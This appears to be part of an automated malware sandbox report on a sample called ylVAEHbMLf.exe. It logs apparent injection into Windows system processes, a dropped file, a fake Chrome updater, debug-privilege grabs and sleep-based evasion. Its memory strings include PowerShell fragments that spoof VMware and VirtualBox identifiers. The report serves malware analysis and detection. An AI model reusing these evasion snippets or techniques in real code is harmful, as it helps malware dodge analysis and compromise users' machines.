                Source: C:\Windows\System32\dwm.exeWindow / User API: threadDelayed 9872Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6812
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2937
                Source: C:\Windows\System32\dialer.exeWindow / User API: threadDelayed 1287
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6965
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2662
                Source: C:\Users\user\Desktop\ylVAEHbMLf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\yfiogronfirx.tmpJump to dropped file
                Source: C:\Windows\System32\dwm.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_10-21242
                Source: C:\Windows\System32\svchost.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_9-14042
                Source: C:\Windows\System32\winlogon.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_7-28065
                Source: C:\Windows\System32\dialer.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_4-448
                Source: C:\Windows\System32\winlogon.exeAPI coverage: 7.8 %
                Source: C:\Windows\System32\lsass.exeAPI coverage: 8.5 %
                Source: C:\Windows\System32\svchost.exeAPI coverage: 6.2 %
                Source: C:\Windows\System32\svchost.exeAPI coverage: 6.0 %
                Source: C:\Windows\System32\svchost.exeAPI coverage: 3.4 %
                Source: C:\Windows\System32\svchost.exeAPI coverage: 6.2 %
                Source: C:\Windows\System32\svchost.exeAPI coverage: 7.0 %
                Source: C:\Windows\System32\svchost.exeAPI coverage: 7.7 %
                Source: C:\Windows\System32\svchost.exeAPI coverage: 6.0 %
                Source: C:\Windows\System32\svchost.exeAPI coverage: 7.5 %
                Source: C:\Windows\System32\svchost.exeAPI coverage: 5.7 %
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeAPI coverage: 1.4 %
                Source: C:\Windows\System32\svchost.exeAPI coverage: 6.2 %
                Source: C:\Windows\System32\svchost.exeAPI coverage: 3.5 %
                Source: C:\Windows\System32\svchost.exeAPI coverage: 6.2 %
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6200Thread sleep count: 4262 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6200Thread sleep count: 5599 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2484Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                Source: C:\Windows\System32\dialer.exe TID: 2180Thread sleep count: 91 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2656Thread sleep count: 5847 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2568Thread sleep count: 3921 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6304Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                Source: C:\Windows\System32\winlogon.exe TID: 6428Thread sleep count: 8389 > 30Jump to behavior
                Source: C:\Windows\System32\winlogon.exe TID: 6428Thread sleep time: -8389000s >= -30000sJump to behavior
                Source: C:\Windows\System32\winlogon.exe TID: 6428Thread sleep count: 1610 > 30Jump to behavior
                Source: C:\Windows\System32\winlogon.exe TID: 6428Thread sleep time: -1610000s >= -30000sJump to behavior
                Source: C:\Windows\System32\lsass.exe TID: 2504Thread sleep count: 9926 > 30Jump to behavior
                Source: C:\Windows\System32\lsass.exe TID: 2504Thread sleep time: -9926000s >= -30000sJump to behavior
                Source: C:\Windows\System32\svchost.exe TID: 7044Thread sleep count: 274 > 30Jump to behavior
                Source: C:\Windows\System32\svchost.exe TID: 7044Thread sleep time: -274000s >= -30000sJump to behavior
                Source: C:\Windows\System32\dwm.exe TID: 6228Thread sleep count: 9872 > 30Jump to behavior
                Source: C:\Windows\System32\dwm.exe TID: 6228Thread sleep time: -9872000s >= -30000sJump to behavior
                Source: C:\Windows\System32\svchost.exe TID: 6380Thread sleep count: 251 > 30Jump to behavior
                Source: C:\Windows\System32\svchost.exe TID: 6380Thread sleep time: -251000s >= -30000sJump to behavior
                Source: C:\Windows\System32\svchost.exe TID: 6324Thread sleep count: 253 > 30Jump to behavior
                Source: C:\Windows\System32\svchost.exe TID: 6324Thread sleep time: -253000s >= -30000sJump to behavior
                Source: C:\Windows\System32\svchost.exe TID: 4208Thread sleep count: 253 > 30Jump to behavior
                Source: C:\Windows\System32\svchost.exe TID: 4208Thread sleep time: -253000s >= -30000sJump to behavior
                Source: C:\Windows\System32\svchost.exe TID: 3512Thread sleep count: 248 > 30Jump to behavior
                Source: C:\Windows\System32\svchost.exe TID: 3512Thread sleep time: -248000s >= -30000sJump to behavior
                Source: C:\Windows\System32\svchost.exe TID: 3704Thread sleep count: 199 > 30Jump to behavior
                Source: C:\Windows\System32\svchost.exe TID: 3704Thread sleep time: -199000s >= -30000sJump to behavior
                Source: C:\Windows\System32\svchost.exe TID: 4180Thread sleep count: 253 > 30Jump to behavior
                Source: C:\Windows\System32\svchost.exe TID: 4180Thread sleep time: -253000s >= -30000sJump to behavior
                Source: C:\Windows\System32\svchost.exe TID: 7096Thread sleep count: 232 > 30Jump to behavior
                Source: C:\Windows\System32\svchost.exe TID: 7096Thread sleep time: -232000s >= -30000sJump to behavior
                Source: C:\Windows\System32\svchost.exe TID: 5724Thread sleep count: 250 > 30Jump to behavior
                Source: C:\Windows\System32\svchost.exe TID: 5724Thread sleep time: -250000s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4348Thread sleep count: 6812 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7072Thread sleep count: 2937 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7124Thread sleep time: -3689348814741908s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 7156Thread sleep count: 249 > 30Jump to behavior
                Source: C:\Windows\System32\svchost.exe TID: 7156Thread sleep time: -249000s >= -30000sJump to behavior
                Source: C:\Windows\System32\svchost.exe TID: 2996Thread sleep count: 249 > 30
                Source: C:\Windows\System32\svchost.exe TID: 2996Thread sleep time: -249000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 5740Thread sleep count: 242 > 30
                Source: C:\Windows\System32\svchost.exe TID: 5740Thread sleep time: -242000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 6376Thread sleep count: 232 > 30
                Source: C:\Windows\System32\svchost.exe TID: 6376Thread sleep time: -232000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 3632Thread sleep count: 249 > 30
                Source: C:\Windows\System32\svchost.exe TID: 3632Thread sleep time: -249000s >= -30000s
                Source: C:\Windows\System32\dialer.exe TID: 4284Thread sleep count: 1287 > 30
                Source: C:\Windows\System32\dialer.exe TID: 4284Thread sleep time: -128700s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 5264Thread sleep count: 252 > 30
                Source: C:\Windows\System32\svchost.exe TID: 5264Thread sleep time: -252000s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 416Thread sleep count: 6965 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 416Thread sleep count: 2662 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1456Thread sleep time: -5534023222112862s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 5180Thread sleep count: 251 > 30
                Source: C:\Windows\System32\svchost.exe TID: 5180Thread sleep time: -251000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 7124Thread sleep count: 249 > 30
                Source: C:\Windows\System32\svchost.exe TID: 7124Thread sleep time: -249000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 2568Thread sleep count: 242 > 30
                Source: C:\Windows\System32\svchost.exe TID: 2568Thread sleep time: -242000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 6740Thread sleep count: 221 > 30
                Source: C:\Windows\System32\svchost.exe TID: 6740Thread sleep time: -221000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 6404Thread sleep count: 249 > 30
                Source: C:\Windows\System32\svchost.exe TID: 6404Thread sleep time: -249000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 5744Thread sleep count: 50 > 30
                Source: C:\Windows\System32\svchost.exe TID: 5744Thread sleep time: -50000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 3716Thread sleep count: 248 > 30
                Source: C:\Windows\System32\svchost.exe TID: 3716Thread sleep time: -248000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 2656Thread sleep count: 251 > 30
                Source: C:\Windows\System32\svchost.exe TID: 2656Thread sleep time: -251000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 4192Thread sleep count: 240 > 30
                Source: C:\Windows\System32\svchost.exe TID: 4192Thread sleep time: -240000s >= -30000s
                Source: C:\Windows\System32\spoolsv.exe TID: 3444Thread sleep count: 251 > 30
                Source: C:\Windows\System32\spoolsv.exe TID: 3444Thread sleep time: -251000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 4856Thread sleep count: 247 > 30
                Source: C:\Windows\System32\svchost.exe TID: 4856Thread sleep time: -247000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 2192Thread sleep time: -30000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 6200Thread sleep count: 231 > 30
                Source: C:\Windows\System32\svchost.exe TID: 6200Thread sleep time: -231000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 1856Thread sleep count: 251 > 30
                Source: C:\Windows\System32\svchost.exe TID: 1856Thread sleep time: -251000s >= -30000s
                Source: C:\Windows\System32\dialer.exeLast function: Thread delayed
                Source: C:\Windows\System32\dialer.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\dwm.exeLast function: Thread delayed
                Source: C:\Windows\System32\dwm.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\dialer.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\spoolsv.exeLast function: Thread delayed
                Source: C:\Windows\System32\spoolsv.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\winlogon.exeCode function: 7_2_00000225DC64BE3C FindFirstFileExW,7_2_00000225DC64BE3C
                Source: C:\Windows\System32\winlogon.exeCode function: 7_2_00000225DC6ABE3C FindFirstFileExW,7_2_00000225DC6ABE3C
                Source: C:\Windows\System32\lsass.exeCode function: 8_2_00000202C0AEBE3C FindFirstFileExW,8_2_00000202C0AEBE3C
                Source: C:\Windows\System32\svchost.exeCode function: 9_2_000002A66130BE3C FindFirstFileExW,9_2_000002A66130BE3C
                Source: C:\Windows\System32\dwm.exeCode function: 10_2_000002BAAE29BE3C FindFirstFileExW,10_2_000002BAAE29BE3C
                Source: C:\Windows\System32\svchost.exeCode function: 11_2_0000026A879CBE3C FindFirstFileExW,11_2_0000026A879CBE3C
                Source: C:\Windows\System32\svchost.exeCode function: 12_2_00000179537ABE3C FindFirstFileExW,12_2_00000179537ABE3C
                Source: C:\Windows\System32\svchost.exeCode function: 12_2_0000017953D4BE3C FindFirstFileExW,12_2_0000017953D4BE3C
                Source: C:\Windows\System32\svchost.exeCode function: 13_2_000002295D56BE3C FindFirstFileExW,13_2_000002295D56BE3C
                Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000025306E6BE3C FindFirstFileExW,14_2_0000025306E6BE3C
                Source: C:\Windows\System32\svchost.exeCode function: 15_2_000001845B3BBE3C FindFirstFileExW,15_2_000001845B3BBE3C
                Source: C:\Windows\System32\svchost.exeCode function: 16_2_000001ADECD4BE3C FindFirstFileExW,16_2_000001ADECD4BE3C
                Source: C:\Windows\System32\svchost.exeCode function: 17_2_000001D55907BE3C FindFirstFileExW,17_2_000001D55907BE3C
                Source: C:\Windows\System32\svchost.exeCode function: 18_2_00000241A9EABE3C FindFirstFileExW,18_2_00000241A9EABE3C
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeCode function: 21_2_000002152C3EBE3C FindFirstFileExW,21_2_000002152C3EBE3C
                Source: C:\Windows\System32\svchost.exeCode function: 24_2_000001CD7319BE3C FindFirstFileExW,24_2_000001CD7319BE3C
                Source: C:\Windows\System32\svchost.exeCode function: 26_2_000002824E89BE3C FindFirstFileExW,26_2_000002824E89BE3C
                Source: C:\Windows\System32\svchost.exeCode function: 26_2_000002824E8FBE3C FindFirstFileExW,26_2_000002824E8FBE3C
                Source: C:\Windows\System32\svchost.exeCode function: 27_2_0000021B47B3BE3C FindFirstFileExW,27_2_0000021B47B3BE3C
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: powershell.exe, 00000005.00000002.1784891637.000001FA2FE68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                Source: lsass.exe, 00000008.00000000.1747558953.00000202BFC89000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicvssNT SERVICE
                Source: svchost.exe, 00000011.00000000.1818112818.000001D559274000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
                Source: svchost.exe, 0000000F.00000002.3019665263.000001845BC0A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000_0r
                Source: svchost.exe, 00000011.00000000.1818112818.000001D559274000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWarVMware SATA CD00
                Source: svchost.exe, 00000011.00000000.1818112818.000001D559274000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: LSI_SASVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
                Source: svchost.exe, 00000031.00000000.1949907163.0000023D1002B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: svchost.exe, 00000011.00000000.1818929292.000001D559386000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a8
                Source: dwm.exe, 0000000A.00000000.1759493693.000002BAAA00C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000S
                Source: svchost.exe, 00000011.00000003.1837092807.000001D5593A4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
                Source: svchost.exe, 00000011.00000000.1818112818.000001D559274000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: storahciNECVMWarVMware SATA CD00
                Source: powershell.exe, 00000005.00000002.1784891637.000001FA2FE68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                Source: svchost.exe, 00000011.00000003.1840991090.000001D559394000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1ap
                Source: svchost.exe, 00000011.00000003.1844293495.000001D559C7F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk 2.0 6000c2942fce4d06663969f532e45d1aPCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
                Source: svchost.exe, 00000011.00000002.2977200435.000001D558DE0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware Virtual disk", $value).replace("VMware", $value).replace("HARDDISK", "WDC").replace("VIRTUAL_DISK", $value)
                Source: lsass.exe, 00000008.00000000.1747335581.00000202BFC13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2981325405.00000202BFC13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.2960919454.000002A660613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000009.00000000.1753411970.000002A660613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000C.00000000.1787229019.000001795302B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.2959653113.000001795302B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000D.00000000.1789041841.000002295CE2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.2959031284.000002295CE2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000000.1799203992.000001845AC3F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2971480214.000001845AC3F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.1816159694.000001D55862B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: svchost.exe, 00000009.00000000.1753452137.000002A66062A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
                Source: svchost.exe, 00000011.00000002.2984001454.000001D558F62000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMCI: Using capabilities (0x1c).
                Source: lsass.exe, 00000008.00000000.1747558953.00000202BFC89000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicshutdownNT SERVICE
                Source: svchost.exe, 00000011.00000002.2977200435.000001D558DE0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $value = $pr.Value.replace("VEN_80EE", $value).replace("VEN_15AD", $value).replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("82801FB", $value).replace("82441FX", $value).replace("82371SB", $value).replace("OpenHCD", $value).replace("VMWare", $value).replace("VMware", $value)
                Source: svchost.exe, 00000011.00000000.1818112818.000001D559274000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: nonicNECVMWarVMware SATA CD00
                Source: svchost.exe, 00000011.00000000.1816159694.000001D55862B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2963751898.000001D55862B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Hypervisor
                Source: powershell.exe, 00000005.00000002.1784891637.000001FA2FE68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                Source: svchost.exe, 00000011.00000003.1840991090.000001D559394000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a@
                Source: svchost.exe, 00000011.00000002.2977200435.000001D558DE0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware", $value).replace("VirtualBox", $value).replace("Oracle Corporation", $value).replace("Microsoft Basic Display Adapter", $value)
                Source: lsass.exe, 00000008.00000000.1748160147.00000202C037F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTVMWare
                Source: svchost.exe, 00000011.00000000.1818112818.000001D559274000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: nonicVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
                Source: svchost.exe, 00000011.00000000.1816191216.000001D558643000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@vmcitpA
                Source: svchost.exe, 00000009.00000003.1981446312.000002A660660000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                Source: svchost.exe, 0000000D.00000002.2956193714.000002295CE00000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
                Source: lsass.exe, 00000008.00000000.1747558953.00000202BFC89000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicheartbeatNT SERVICE
                Source: svchost.exe, 00000011.00000000.1818211836.000001D5592C3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: dowvmci
                Source: svchost.exe, 00000011.00000000.1818112818.000001D559274000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware
                Source: svchost.exe, 00000011.00000003.1846316422.000001D5599B5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                Source: svchost.exe, 00000011.00000002.2977200435.000001D558DE0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: if(($pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "AdapterCompatibility" -or $pr.Name -eq "Description" -or $pr.Name -eq "InfSection" -or $pr.Name -eq "VideoProcessor") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VirtualBox' -or $pr.Value -match 'VMware' -or $pr.Value -match 'Oracle Corporation' -or $pr.Value -match 'Microsoft Basic Display Adapter'))
                Source: svchost.exe, 00000011.00000002.2977200435.000001D558DE0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Model" -or $pr.Name -eq "PNPDeviceID") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMware'))
                Source: dwm.exe, 0000000A.00000000.1759493693.000002BAAA00C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                Source: svchost.exe, 00000011.00000002.2977200435.000001D558DE0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "Service" -or $pr.Name -eq "Description") -and ($pr.Value -match 'VEN_80EE' -or $pr.Value -match 'VEN_15AD' -or $pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMWare' -or $pr.Value -match 'VMware' -or $pr.Value -match '82801FB' -or $pr.Value -match '82441FX' -or $pr.Value -match '82371SB' -or $pr.Value -match 'OpenHCD'))
                Source: C:\Windows\System32\dialer.exeAPI call chain: ExitProcess graph end nodegraph_4-510
                Source: C:\Users\user\Desktop\ylVAEHbMLf.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\System32\winlogon.exeCode function: 7_2_00000225DC647E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00000225DC647E70
                Source: C:\Windows\System32\dialer.exeCode function: 4_2_00007FF78AB314E4 GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,K32EnumProcesses,OpenProcess,K32EnumProcessModules,ReadProcessMemory,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,4_2_00007FF78AB314E4
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\System32\dialer.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Windows\System32\dialer.exeProcess token adjusted: Debug
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Windows\System32\winlogon.exeCode function: 7_2_00000225DC647E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00000225DC647E70
                Source: C:\Windows\System32\winlogon.exeCode function: 7_2_00000225DC64B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00000225DC64B50C
                Source: C:\Windows\System32\winlogon.exeCode function: 7_2_00000225DC6A7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00000225DC6A7E70
                Source: C:\Windows\System32\winlogon.exeCode function: 7_2_00000225DC6AB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00000225DC6AB50C
